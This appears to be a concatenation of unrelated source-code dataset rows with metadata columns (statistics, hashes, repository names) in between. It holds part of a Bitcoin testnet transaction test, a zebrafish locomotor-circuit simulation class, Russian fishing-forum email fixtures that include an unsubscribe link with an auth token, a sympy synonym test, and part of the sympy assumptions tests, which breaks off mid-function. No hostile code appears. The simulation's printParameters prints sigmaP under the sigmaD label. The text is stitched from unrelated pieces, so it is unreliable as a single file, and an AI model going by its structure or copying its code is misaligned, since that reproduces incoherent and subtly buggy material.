tx_in = TxIn(unhexlify(prev_tx), prev_index, b'', 0xffffffff, b'\x00', prev_value, prev_script_pubkey)
script = B2XTx.get_address_data(destination)['script_pubkey'].serialize()
tx_out = TxOut(amount, script)
tx = B2XTx(2, [tx_in], [tx_out], 0, testnet=True)
tx.sign(priv_key)
want = "0200000001bd7df4f52d73e4a452bffad72a27747bb6d62efac7e2b160438e1a3c3373d0b6000000006a47304402201df7c8c97443bd46da751e0051a4395ba3613be3604be97d3c801c21e3d23c79022012ad30b7ffd42ad7bb96f9157519f7e3c35409ed54f783a3c854a596343a6c713121030f96812693c4a50162134cfa307afb63580171963d6c4198e8e5cfeee2c92b60ffffffff0100e9c829010000001976a91478738f2c5a75397eb2f851597261f766a67d9b6388ac00000000"
self.assertTrue(tx.verify())
self.assertEqual(tx.serialize().hex(), want)
def test_fetch_address_utxos(self):
addr = 'mgzCpjQxLVmw89FRrxrZqpzfE33HRAjaSU'
utxos = Tx.fetch_address_utxos(addr)
total = 0
for _, prev_tx, prev_index, value in utxos:
total += value
self.assertTrue(total > 0)
| 96.153605
| 3,370
| 0.857334
| 1,363
| 30,673
| 19.082172
| 0.142333
| 0.009997
| 0.014764
| 0.01661
| 0.336345
| 0.322273
| 0.303433
| 0.294898
| 0.288631
| 0.287208
| 0
| 0.493355
| 0.099697
| 30,673
| 318
| 3,371
| 96.455975
| 0.448488
| 0.001239
| 0
| 0.327526
| 0
| 0
| 0.65955
| 0.657657
| 0
| 1
| 0.000979
| 0
| 0.167247
| 1
| 0.087108
| false
| 0
| 0.02439
| 0
| 0.114983
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5d8c11439565c2bf602cfa6ed28961499a6f1eb8
| 5,381
|
py
|
Python
|
Zebrafish spinal locomotor circuit/Version 2/Double_coiling_with_sigmas.py
|
Bui-lab/Code
|
6ce5972a4bd0c059ab167522ab1d945f3b0f5707
|
[
"MIT"
] | null | null | null |
Zebrafish spinal locomotor circuit/Version 2/Double_coiling_with_sigmas.py
|
Bui-lab/Code
|
6ce5972a4bd0c059ab167522ab1d945f3b0f5707
|
[
"MIT"
] | null | null | null |
Zebrafish spinal locomotor circuit/Version 2/Double_coiling_with_sigmas.py
|
Bui-lab/Code
|
6ce5972a4bd0c059ab167522ab1d945f3b0f5707
|
[
"MIT"
] | 2
|
2021-08-25T08:14:52.000Z
|
2021-11-29T12:56:17.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Aug 25 08:41:10 2017
@author: Yann Roussel and Tuan Bui
Edited by: Emine Topcu on Sep 2021
"""
from random import gauss
from Izhikevich_class import Izhikevich_9P, Leaky_Integrator
from Double_coiling_model import Double_coil_base
class Double_coil_with_sigmas(Double_coil_base):
sigmaD = 0
sigmaL = 0
sigmaP = 0
sigmaW = 0
def __init__(self, dt = 0.1, stim0 = 8, sigmaD = 0, sigmaL = 0, sigmaP = 0, sigmaW = 0,
E_glu = 0, E_gly = -70,
cv = 0.55, nIC = 5, nMN = 10, nV0d = 10, nV0v = 10, nV2a = 10, nMuscle = 10):
super().__init__(dt, stim0, sigmaD, E_glu, E_gly,
cv, nIC, nMN, nV0d, nV0v, nV2a, nMuscle)
self.sigmaD = sigmaD
self.sigmaL = sigmaL
self.sigmaP = sigmaP
self.sigmaW = sigmaW
def initNeurons(self):
## Declare Neuron Types
self.L_IC = [ Izhikevich_9P(a=0.0002*gauss(1, self.sigmaP),b=0.5*gauss(1, self.sigmaP),c=-40*gauss(1, self.sigmaP), d=5*gauss(1, self.sigmaP), vmax=0*gauss(1, self.sigmaP), vr=-60*gauss(1, self.sigmaP), vt=-45*gauss(1, self.sigmaP), k=0.3*gauss(1, self.sigmaP), Cm = 50*gauss(1, self.sigmaP), dt = self.dt, x=1.0,y=-1) for i in range(self.nIC)]
self.R_IC = [ Izhikevich_9P(a=0.0002*gauss(1, self.sigmaP),b=0.5*gauss(1, self.sigmaP),c=-40*gauss(1, self.sigmaP), d=5*gauss(1, self.sigmaP), vmax=0*gauss(1, self.sigmaP), vr=-60*gauss(1, self.sigmaP), vt=-45*gauss(1, self.sigmaP), k=0.3*gauss(1, self.sigmaP), Cm = 50*gauss(1, self.sigmaP), dt = self.dt, x=1.0,y=1) for i in range(self.nIC)]
self.L_MN = [ Izhikevich_9P(a=0.5*gauss(1, self.sigmaP),b=0.1*gauss(1, self.sigmaP),c=-50*gauss(1, self.sigmaP), d=100*gauss(1, self.sigmaP), vmax=10*gauss(1, self.sigmaP), vr=-60*gauss(1, self.sigmaP), vt=-50*gauss(1, self.sigmaP), k=0.05*gauss(1, self.sigmaP), Cm = 20*gauss(1, self.sigmaP), dt = self.dt, x=5.0+1.6*i,y=-1) for i in range(self.nMN)]
self.R_MN = [ Izhikevich_9P(a=0.5*gauss(1, self.sigmaP),b=0.1*gauss(1, self.sigmaP),c=-50*gauss(1, self.sigmaP), d=100*gauss(1, self.sigmaP), vmax=10*gauss(1, self.sigmaP), vr=-60*gauss(1, self.sigmaP), vt=-50*gauss(1, self.sigmaP), k=0.05*gauss(1, self.sigmaP), Cm = 20*gauss(1, self.sigmaP), dt = self.dt, x=5.0+1.6*i,y=1) for i in range(self.nMN)]
self.L_V0d = [ Izhikevich_9P(a=0.02*gauss(1, self.sigmaP),b=0.1*gauss(1, self.sigmaP),c=-30*gauss(1, self.sigmaP), d=3.75*gauss(1, self.sigmaP), vmax=10*gauss(1, self.sigmaP), vr=-60*gauss(1, self.sigmaP), vt=-45*gauss(1, self.sigmaP), k=0.05*gauss(1, self.sigmaP), Cm = 20*gauss(1, self.sigmaP), dt = self.dt, x=5.0+1.6*i,y=-1) for i in range(self.nV0d)]
self.R_V0d = [ Izhikevich_9P(a=0.02*gauss(1, self.sigmaP),b=0.1*gauss(1, self.sigmaP),c=-30*gauss(1, self.sigmaP), d=3.75*gauss(1, self.sigmaP), vmax=10*gauss(1, self.sigmaP), vr=-60*gauss(1, self.sigmaP), vt=-45*gauss(1, self.sigmaP), k=0.05*gauss(1, self.sigmaP), Cm = 20*gauss(1, self.sigmaP), dt = self.dt, x=5.0+1.6*i,y=1) for i in range(self.nV0d)]
self.L_V0v = [ Izhikevich_9P(a=0.02*gauss(1, self.sigmaP), b=0.1*gauss(1, self.sigmaP), c=-30*gauss(1, self.sigmaP), d=11.6*gauss(1, self.sigmaP), vmax=10*gauss(1, self.sigmaP), vr=-60*gauss(1, self.sigmaP), vt=-45*gauss(1, self.sigmaP), k=0.05*gauss(1, self.sigmaP), Cm = 20*gauss(1, self.sigmaP), dt = self.dt, x=5.1+1.6*i,y=-1) for i in range(self.nV0v)]
self.R_V0v = [ Izhikevich_9P(a=0.02*gauss(1, self.sigmaP), b=0.1*gauss(1, self.sigmaP), c=-30*gauss(1, self.sigmaP), d=11.6*gauss(1, self.sigmaP), vmax=10*gauss(1, self.sigmaP), vr=-60*gauss(1, self.sigmaP), vt=-45*gauss(1, self.sigmaP), k=0.05*gauss(1, self.sigmaP), Cm = 20*gauss(1, self.sigmaP), dt = self.dt, x=5.1+1.6*i,y=1) for i in range(self.nV0v)]
self.L_V2a = [ Izhikevich_9P(a=0.5*gauss(1, self.sigmaP), b=0.1*gauss(1, self.sigmaP), c=-50*gauss(1, self.sigmaP), d=100*gauss(1, self.sigmaP), vmax=10*gauss(1, self.sigmaP), vr=-60*gauss(1, self.sigmaP), vt=-45*gauss(1, self.sigmaP), k=0.05*gauss(1, self.sigmaP), Cm = 20*gauss(1, self.sigmaP), dt = self.dt, x=5.1+1.6*i,y=-1) for i in range(self.nV2a)]
self.R_V2a = [ Izhikevich_9P(a=0.5*gauss(1, self.sigmaP), b=0.1*gauss(1, self.sigmaP), c=-50*gauss(1, self.sigmaP), d=100*gauss(1, self.sigmaP), vmax=10*gauss(1, self.sigmaP), vr=-60*gauss(1, self.sigmaP), vt=-45*gauss(1, self.sigmaP), k=0.05*gauss(1, self.sigmaP), Cm = 20*gauss(1, self.sigmaP), dt = self.dt, x=5.1+1.6*i,y=1) for i in range(self.nV2a)]
self.L_Muscle = [ Leaky_Integrator(50.0*gauss(1, self.sigmaP), 5.0*gauss(1, self.sigmaP), self.dt, 5.0+1.6*i,-1) for i in range(self.nMuscle)]
self.R_Muscle = [ Leaky_Integrator(50.0*gauss(1, self.sigmaP), 5.0*gauss(1, self.sigmaP), self.dt, 5.0+1.6*i, 1) for i in range(self.nMuscle)]
def rangeNoiseMultiplier(self):
return gauss(1, self.sigmaL)
def gapWeightNoiseMultiplier(self):
return gauss(1, self.sigmaW)
def synWeightNoiseMultiplier(self):
return gauss(1, self.sigmaW)
def getStimulus(self):
return self.stim0 * gauss(1, self.sigmaD)
def printParameters(self):
super().printParameters()
print("sigmaD: " + str(self.sigmaP) + "; sigmaL: " + str(self.sigmaL) + "; sigmaP: " + str(self.sigmaP) + "; sigmaW: " + str(self.sigmaW))
| 76.871429
| 365
| 0.64003
| 1,042
| 5,381
| 3.259117
| 0.113244
| 0.173145
| 0.288575
| 0.442874
| 0.776207
| 0.770318
| 0.770318
| 0.753239
| 0.736749
| 0.736749
| 0
| 0.097368
| 0.152574
| 5,381
| 69
| 366
| 77.985507
| 0.647368
| 0.031778
| 0
| 0.04878
| 0
| 0
| 0.007312
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.170732
| false
| 0
| 0.073171
| 0.097561
| 0.463415
| 0.073171
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5dc99f31e008fba7d441858e4cdd266aeb18043a
| 5,886
|
py
|
Python
|
obsolete/fixtures/rybaodessa_forum.py
|
telegrambotdev/telegram.email.notify
|
d16880819b2f1887b0e0f0b9841de2a122d81dd6
|
[
"MIT"
] | null | null | null |
obsolete/fixtures/rybaodessa_forum.py
|
telegrambotdev/telegram.email.notify
|
d16880819b2f1887b0e0f0b9841de2a122d81dd6
|
[
"MIT"
] | null | null | null |
obsolete/fixtures/rybaodessa_forum.py
|
telegrambotdev/telegram.email.notify
|
d16880819b2f1887b0e0f0b9841de2a122d81dd6
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
source1 = """
Тилигульский лиман
Одесский Клуб Рыболовов Здравствуйте, VinsT!
мирон 2 опубликовал комментарий в тему, Тилигульский лиман
мирон 2 опубликовал(а): 14 часа назад, Ігор сказал:
Можно связывать канатом использованые шины и притапливать в лимане. Их быстро освоят мидии и другие жители лимана.
А с экологией как? Перейти к сообщению
Одесский Клуб Рыболовов Вы получили это письмо, потому что вы подписаны на Тема "Тилигульский лиман".
Отказаться от получения этих писем? Отписаться или Настройка уведомлений .
Одесский Клуб Рыболовов, одесса, одесса, одесса, 65000
"""
result1 = """Одесский Клуб Рыболовов:
Тилигульский лиман
мирон 2 опубликовал(а): 14 часа назад, Ігор сказал:
Можно связывать канатом использованые шины и притапливать в лимане. Их быстро освоят мидии и другие жители лимана.
А с экологией как?"""
source2 = """
Три карася
Одесский Клуб Рыболовов Здравствуйте, VinsT!
Anutka_Odessa_Mayaki опубликовал комментарий в тему, Три карася
Anutka_Odessa_Mayaki опубликовал(а): http://fishingclub.od.ua/forums/index.php?/topic/20432-открытый-турнир-по-карпфишингу-открытие-сезона-2018-на-рк-три-карася/ page=3
Приглашаем всех желающих принять участие в турнире "Один на один с трофеем"! Перейти к сообщению
Одесский Клуб Рыболовов Вы получили это письмо, потому что вы подписаны на Тема "Три карася".
Отказаться от получения этих писем? Отписаться или Настройка уведомлений .
Одесский Клуб Рыболовов, одесса, одесса, одесса, 65000
"""
result2 = """Одесский Клуб Рыболовов:
Три карася
Anutka_Odessa_Mayaki опубликовал(а): http://fishingclub.od.ua/forums/index.php?/topic/20432-открытый-турнир-по-карпфишингу-открытие-сезона-2018-на-рк-три-карася/ page=3
Приглашаем всех желающих принять участие в турнире "Один на один с трофеем"!"""
source3 = """
Ответ в теме 'Рыбалка на озерах и ставках'
Уважаемый(ая) VinsT,
dimon777 только что ответил в теме, на которую Вы подписались, - Рыбалка на озерах и ставках - в разделе Охота и рыбалка Одесский форум.
Эта тема расположена по адресу:
http://forumodua.com/showthread.php?t=1548612&goto=newpost
Размещенное сообщение:
***************
Вот нашел еще один интересный водоем на просторах и-нета Чистоводное в Белгород-Днестровском районе https://www.youtube.com/watch?v=7wJEKTmW1pE
Может кто был там, поделитесь инфой.
***************
Также могут быть и другие сообщения, но Вы не будете получать уведомления, пока снова не посетите форум.
С наилучшими пожеланиями,
Одесский форум
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Отказ от подписки:
Чтобы отказаться от получения рассылки по этой теме, пожалуйста, перейдите на страницу:
http://forumodua.com/subscription.php?do=removesubscription&type=thread&subscriptionid=13057535&auth=bc52182903810d701d0ff06c2a122e2d
Чтобы отказаться от получения рассылок по ВСЕМ темам, пожалуйста, перейдите на страницу:
http://forumodua.com/subscription.php?do=viewsubscription&folderid=all
"""
result3 = """dimon777 только что ответил в теме, на которую Вы подписались, - Рыбалка на озерах и ставках - в разделе Охота и рыбалка Одесский форум.
Эта тема расположена по адресу:
http://forumodua.com/showthread.php?t=1548612&goto=newpost
Размещенное сообщение:
***************
Вот нашел еще один интересный водоем на просторах и-нета Чистоводное в Белгород-Днестровском районе https://www.youtube.com/watch?v=7wJEKTmW1pE
Может кто был там, поделитесь инфой.
***************
Также могут быть и другие сообщения, но Вы не будете получать уведомления, пока снова не посетите форум."""
broken1 = """
Ответ в теме 'Рыбалка на озерах и ставках'
Уважаемый(ая) VinsT,
dimon777 только что ответил - Рыбалка на озерах и ставках - в разделе Охота и рыбалка Одесский форум.
"""
broken2 = """Ответ в теме 'Рыбалка на озерах и ставках' dimon777 только что ответил в теме, на которую Вы подписались, - Рыбалка на озерах и ставках - в разделе Охота и рыбалка Одесский форум.
"""
broken3 = """
Ответ в теме 'Рыбалка на озерах и ставках'
Уважаемый(ая) VinsT,
dimon777 только что ответил в теме, на которую Вы подписались, - Рыбалка на озерах и ставках - в разделе Охота и рыбалка Одесский форум.
Эта тема расположена по адресу:
http://forumodua.com/showthread.php?t=1548612&goto=newpost
Размещенное сообщение:
***************
Вот нашел еще один интересный водоем на просторах и-нета Чистоводное в Белгород-Днестровском районе https://www.youtube.com/watch?v=7wJEKTmW1pE
Может кто был там, поделитесь инфой.
***************
С наилучшими пожеланиями,
Одесский форум
"""
result4 = """dimon777 только что ответил в теме, на которую Вы подписались, - Рыбалка на озерах и ставках - в разделе Охота и рыбалка Одесский форум.
Эта тема расположена по адресу:
http://forumodua.com/showthread.php?t=1548612&goto=newpost
Размещенное сообщение:
***************
Вот нашел еще один интересный водоем на просторах и-нета Чистоводное в Белгород-Днестровском районе https://www.youtube.com/watch?v=7wJEKTmW1pE
Может кто был там, поделитесь инфой.
***************
С наилучшими пожеланиями,
Одесский форум"""
source5 = """
Тилигульский лиман
Одесский Клуб Рыболовов Здравствуйте, VinsT!
мирон 2 опубликовал комментарий в тему, Тилигульский лиман
мирон 2 опубликовал(а): 14 часа назад, Ігор сказал:
Можно связывать канатом использованые шины и притапливать в лимане. Их быстро освоят мидии и другие жители лимана.
А с экологией как?
Перейти к сообщению
Одесский Клуб Рыболовов Вы получили это письмо, потому что вы подписаны на Тема "Тилигульский лиман".
Отказаться от получения этих писем? Отписаться или Настройка уведомлений .
Одесский Клуб Рыболовов, одесса, одесса, одесса, 65000
"""
result5 = """Одесский Клуб Рыболовов:
Тилигульский лиман
мирон 2 опубликовал(а): 14 часа назад, Ігор сказал:
Можно связывать канатом использованые шины и притапливать в лимане. Их быстро освоят мидии и другие жители лимана.
А с экологией как?"""
| 36.110429
| 192
| 0.766395
| 817
| 5,886
| 5.514076
| 0.237454
| 0.031964
| 0.055938
| 0.035516
| 0.91232
| 0.896115
| 0.896115
| 0.896115
| 0.88879
| 0.88879
| 0
| 0.028763
| 0.137615
| 5,886
| 162
| 193
| 36.333333
| 0.858747
| 0.003568
| 0
| 0.731481
| 0
| 0.111111
| 0.962988
| 0.020638
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f8e59d2b8f414a2a0e880f95b984373c6e0bd6df
| 171
|
py
|
Python
|
tests/utils/test_helper_synonym.py
|
alphagov-mirror/govuk-entity-personalisation
|
a674bca4c15691fe2c4e32ea213dfccf3cb0e8ec
|
[
"MIT"
] | 1
|
2021-02-15T17:35:59.000Z
|
2021-02-15T17:35:59.000Z
|
tests/utils/test_helper_synonym.py
|
alphagov-mirror/govuk-entity-personalisation
|
a674bca4c15691fe2c4e32ea213dfccf3cb0e8ec
|
[
"MIT"
] | 16
|
2020-11-30T14:41:31.000Z
|
2021-09-09T15:33:46.000Z
|
tests/utils/test_helper_synonym.py
|
alphagov-mirror/govuk-entity-personalisation
|
a674bca4c15691fe2c4e32ea213dfccf3cb0e8ec
|
[
"MIT"
] | 4
|
2020-12-14T17:36:31.000Z
|
2021-04-10T20:12:46.000Z
|
from src.utils.helper_synonym import get_synonym_all
def test_get_synonym_all(terms_synonyms):
assert get_synonym_all(terms=terms_synonyms.keys()) == terms_synonyms
| 28.5
| 73
| 0.830409
| 26
| 171
| 5.038462
| 0.538462
| 0.229008
| 0.29771
| 0.274809
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.093567
| 171
| 5
| 74
| 34.2
| 0.845161
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| false
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
f8fac0b04fde68dfb9b4133f0f134bf699bd57ba
| 63,245
|
py
|
Python
|
sympy/assumptions/tests/test_query.py
|
josephmisiti/sympy
|
683ccf471a826a75235694ae1ba3dd935d5c8e12
|
[
"BSD-3-Clause"
] | 1
|
2020-12-27T18:43:22.000Z
|
2020-12-27T18:43:22.000Z
|
sympy/assumptions/tests/test_query.py
|
josephmisiti/sympy
|
683ccf471a826a75235694ae1ba3dd935d5c8e12
|
[
"BSD-3-Clause"
] | null | null | null |
sympy/assumptions/tests/test_query.py
|
josephmisiti/sympy
|
683ccf471a826a75235694ae1ba3dd935d5c8e12
|
[
"BSD-3-Clause"
] | null | null | null |
from sympy.utilities.pytest import raises, XFAIL
from sympy.utilities.pytest import raises, XFAIL
from sympy.core import Symbol, symbols, S, Rational, Integer, I, pi, oo
from sympy.functions import exp, log, sin, cos, sign, re, im, sqrt, Abs
from sympy.assumptions import (global_assumptions, Q, ask,
register_handler, remove_handler, AssumptionsContext)
from sympy.assumptions.handlers import AskHandler
from sympy.assumptions.ask import (compute_known_facts,
known_facts_cnf, known_facts_dict)
def test_int_1():
z = 1
assert ask(Q.commutative(z)) == True
assert ask(Q.integer(z)) == True
assert ask(Q.rational(z)) == True
assert ask(Q.real(z)) == True
assert ask(Q.complex(z)) == True
assert ask(Q.irrational(z)) == False
assert ask(Q.imaginary(z)) == False
assert ask(Q.positive(z)) == True
assert ask(Q.negative(z)) == False
assert ask(Q.even(z)) == False
assert ask(Q.odd(z)) == True
assert ask(Q.bounded(z)) == True
assert ask(Q.infinitesimal(z)) == False
assert ask(Q.prime(z)) == False
assert ask(Q.composite(z)) == True
def test_float_1():
z = 1.0
assert ask(Q.commutative(z)) == True
assert ask(Q.integer(z)) == True
assert ask(Q.rational(z)) == True
assert ask(Q.real(z)) == True
assert ask(Q.complex(z)) == True
assert ask(Q.irrational(z)) == False
assert ask(Q.imaginary(z)) == False
assert ask(Q.positive(z)) == True
assert ask(Q.negative(z)) == False
assert ask(Q.even(z)) == False
assert ask(Q.odd(z)) == True
assert ask(Q.bounded(z)) == True
assert ask(Q.infinitesimal(z)) == False
assert ask(Q.prime(z)) == False
assert ask(Q.composite(z)) == True
z = 7.2123
assert ask(Q.commutative(z)) == True
assert ask(Q.integer(z)) == False
assert ask(Q.rational(z)) == True
assert ask(Q.real(z)) == True
assert ask(Q.complex(z)) == True
assert ask(Q.irrational(z)) == False
assert ask(Q.imaginary(z)) == False
assert ask(Q.positive(z)) == True
assert ask(Q.negative(z)) == False
assert ask(Q.even(z)) == False
assert ask(Q.odd(z)) == False
assert ask(Q.bounded(z)) == True
assert ask(Q.infinitesimal(z)) == False
assert ask(Q.prime(z)) == False
assert ask(Q.composite(z)) == False
def test_zero_0():
z = Integer(0)
assert ask(Q.nonzero(z)) == False
assert ask(Q.commutative(z)) == True
assert ask(Q.integer(z)) == True
assert ask(Q.rational(z)) == True
assert ask(Q.real(z)) == True
assert ask(Q.complex(z)) == True
assert ask(Q.imaginary(z)) == False
assert ask(Q.positive(z)) == False
assert ask(Q.negative(z)) == False
assert ask(Q.even(z)) == True
assert ask(Q.odd(z)) == False
assert ask(Q.bounded(z)) == True
assert ask(Q.infinitesimal(z)) == True
assert ask(Q.prime(z)) == False
assert ask(Q.composite(z)) == False
def test_negativeone():
z = Integer(-1)
assert ask(Q.nonzero(z)) == True
assert ask(Q.commutative(z)) == True
assert ask(Q.integer(z)) == True
assert ask(Q.rational(z)) == True
assert ask(Q.real(z)) == True
assert ask(Q.complex(z)) == True
assert ask(Q.irrational(z)) == False
assert ask(Q.imaginary(z)) == False
assert ask(Q.positive(z)) == False
assert ask(Q.negative(z)) == True
assert ask(Q.even(z)) == False
assert ask(Q.odd(z)) == True
assert ask(Q.bounded(z)) == True
assert ask(Q.infinitesimal(z)) == False
assert ask(Q.prime(z)) == False
assert ask(Q.composite(z)) == False
def test_infinity():
oo = S.Infinity
assert ask(Q.commutative(oo)) == True
assert ask(Q.integer(oo)) == False
assert ask(Q.rational(oo)) == False
assert ask(Q.real(oo)) == False
assert ask(Q.extended_real(oo)) == True
assert ask(Q.complex(oo)) == False
assert ask(Q.irrational(oo)) == False
assert ask(Q.imaginary(oo)) == False
assert ask(Q.positive(oo)) == True
assert ask(Q.negative(oo)) == False
assert ask(Q.even(oo)) == False
assert ask(Q.odd(oo)) == False
assert ask(Q.bounded(oo)) == False
assert ask(Q.infinitesimal(oo)) == False
assert ask(Q.prime(oo)) == False
assert ask(Q.composite(oo)) == False
def test_neg_infinity():
mm = S.NegativeInfinity
assert ask(Q.commutative(mm)) == True
assert ask(Q.integer(mm)) == False
assert ask(Q.rational(mm)) == False
assert ask(Q.real(mm)) == False
assert ask(Q.extended_real(mm)) == True
assert ask(Q.complex(mm)) == False
assert ask(Q.irrational(mm)) == False
assert ask(Q.imaginary(mm)) == False
assert ask(Q.positive(mm)) == False
assert ask(Q.negative(mm)) == True
assert ask(Q.even(mm)) == False
assert ask(Q.odd(mm)) == False
assert ask(Q.bounded(mm)) == False
assert ask(Q.infinitesimal(mm)) == False
assert ask(Q.prime(mm)) == False
assert ask(Q.composite(mm)) == False
def test_nan():
nan = S.NaN
assert ask(Q.commutative(nan)) == True
assert ask(Q.integer(nan)) == False
assert ask(Q.rational(nan)) == False
assert ask(Q.real(nan)) == False
assert ask(Q.extended_real(nan)) == False
assert ask(Q.complex(nan)) == False
assert ask(Q.irrational(nan)) == False
assert ask(Q.imaginary(nan)) == False
assert ask(Q.positive(nan)) == False
assert ask(Q.nonzero(nan)) == True
assert ask(Q.even(nan)) == False
assert ask(Q.odd(nan)) == False
assert ask(Q.bounded(nan)) == False
assert ask(Q.infinitesimal(nan)) == False
assert ask(Q.prime(nan)) == False
assert ask(Q.composite(nan)) == False
def test_Rational_number():
r = Rational(3,4)
assert ask(Q.commutative(r)) == True
assert ask(Q.integer(r)) == False
assert ask(Q.rational(r)) == True
assert ask(Q.real(r)) == True
assert ask(Q.complex(r)) == True
assert ask(Q.irrational(r)) == False
assert ask(Q.imaginary(r)) == False
assert ask(Q.positive(r)) == True
assert ask(Q.negative(r)) == False
assert ask(Q.even(r)) == False
assert ask(Q.odd(r)) == False
assert ask(Q.bounded(r)) == True
assert ask(Q.infinitesimal(r)) == False
assert ask(Q.prime(r)) == False
assert ask(Q.composite(r)) == False
r = Rational(1,4)
assert ask(Q.positive(r)) == True
assert ask(Q.negative(r)) == False
r = Rational(5,4)
assert ask(Q.negative(r)) == False
assert ask(Q.positive(r)) == True
r = Rational(5,3)
assert ask(Q.positive(r)) == True
assert ask(Q.negative(r)) == False
r = Rational(-3,4)
assert ask(Q.positive(r)) == False
assert ask(Q.negative(r)) == True
r = Rational(-1,4)
assert ask(Q.positive(r)) == False
assert ask(Q.negative(r)) == True
r = Rational(-5,4)
assert ask(Q.negative(r)) == True
assert ask(Q.positive(r)) == False
r = Rational(-5,3)
assert ask(Q.positive(r)) == False
assert ask(Q.negative(r)) == True
def test_sqrt_2():
z = sqrt(2)
assert ask(Q.commutative(z)) == True
assert ask(Q.integer(z)) == False
assert ask(Q.rational(z)) == False
assert ask(Q.real(z)) == True
assert ask(Q.complex(z)) == True
assert ask(Q.irrational(z)) == True
assert ask(Q.imaginary(z)) == False
assert ask(Q.positive(z)) == True
assert ask(Q.negative(z)) == False
assert ask(Q.even(z)) == False
assert ask(Q.odd(z)) == False
assert ask(Q.bounded(z)) == True
assert ask(Q.infinitesimal(z)) == False
assert ask(Q.prime(z)) == False
assert ask(Q.composite(z)) == False
def test_pi():
z = S.Pi
assert ask(Q.commutative(z)) == True
assert ask(Q.integer(z)) == False
assert ask(Q.rational(z)) == False
assert ask(Q.real(z)) == True
assert ask(Q.complex(z)) == True
assert ask(Q.irrational(z)) == True
assert ask(Q.imaginary(z)) == False
assert ask(Q.positive(z)) == True
assert ask(Q.negative(z)) == False
assert ask(Q.even(z)) == False
assert ask(Q.odd(z)) == False
assert ask(Q.bounded(z)) == True
assert ask(Q.infinitesimal(z)) == False
assert ask(Q.prime(z)) == False
assert ask(Q.composite(z)) == False
z = S.Pi + 1
assert ask(Q.commutative(z)) == True
assert ask(Q.integer(z)) == False
assert ask(Q.rational(z)) == False
assert ask(Q.real(z)) == True
assert ask(Q.complex(z)) == True
assert ask(Q.irrational(z)) == True
assert ask(Q.imaginary(z)) == False
assert ask(Q.positive(z)) == True
assert ask(Q.negative(z)) == False
assert ask(Q.even(z)) == False
assert ask(Q.odd(z)) == False
assert ask(Q.bounded(z)) == True
assert ask(Q.infinitesimal(z)) == False
assert ask(Q.prime(z)) == False
assert ask(Q.composite(z)) == False
z = 2*S.Pi
assert ask(Q.commutative(z)) == True
assert ask(Q.integer(z)) == False
assert ask(Q.rational(z)) == False
assert ask(Q.real(z)) == True
assert ask(Q.complex(z)) == True
assert ask(Q.irrational(z)) == True
assert ask(Q.imaginary(z)) == False
assert ask(Q.positive(z)) == True
assert ask(Q.negative(z)) == False
assert ask(Q.even(z)) == False
assert ask(Q.odd(z)) == False
assert ask(Q.bounded(z)) == True
assert ask(Q.infinitesimal(z)) == False
assert ask(Q.prime(z)) == False
assert ask(Q.composite(z)) == False
z = S.Pi ** 2
assert ask(Q.commutative(z)) == True
assert ask(Q.integer(z)) == False
assert ask(Q.rational(z)) == False
assert ask(Q.real(z)) == True
assert ask(Q.complex(z)) == True
assert ask(Q.irrational(z)) == True
assert ask(Q.imaginary(z)) == False
assert ask(Q.positive(z)) == True
assert ask(Q.negative(z)) == False
assert ask(Q.even(z)) == False
assert ask(Q.odd(z)) == False
assert ask(Q.bounded(z)) == True
assert ask(Q.infinitesimal(z)) == False
assert ask(Q.prime(z)) == False
assert ask(Q.composite(z)) == False
z = (1+S.Pi) ** 2
assert ask(Q.commutative(z)) == True
assert ask(Q.integer(z)) == False
assert ask(Q.rational(z)) == False
assert ask(Q.real(z)) == True
assert ask(Q.complex(z)) == True
assert ask(Q.irrational(z)) == True
assert ask(Q.imaginary(z)) == False
assert ask(Q.positive(z)) == True
assert ask(Q.negative(z)) == False
assert ask(Q.even(z)) == False
assert ask(Q.odd(z)) == False
assert ask(Q.bounded(z)) == True
assert ask(Q.infinitesimal(z)) == False
assert ask(Q.prime(z)) == False
assert ask(Q.composite(z)) == False
def test_E():
z = S.Exp1
assert ask(Q.commutative(z)) == True
assert ask(Q.integer(z)) == False
assert ask(Q.rational(z)) == False
assert ask(Q.real(z)) == True
assert ask(Q.complex(z)) == True
assert ask(Q.irrational(z)) == True
assert ask(Q.imaginary(z)) == False
assert ask(Q.positive(z)) == True
assert ask(Q.negative(z)) == False
assert ask(Q.even(z)) == False
assert ask(Q.odd(z)) == False
assert ask(Q.bounded(z)) == True
assert ask(Q.infinitesimal(z)) == False
assert ask(Q.prime(z)) == False
assert ask(Q.composite(z)) == False
def test_I():
I = S.ImaginaryUnit
z = I
assert ask(Q.commutative(z)) == True
assert ask(Q.integer(z)) == False
assert ask(Q.rational(z)) == False
assert ask(Q.real(z)) == False
assert ask(Q.complex(z)) == True
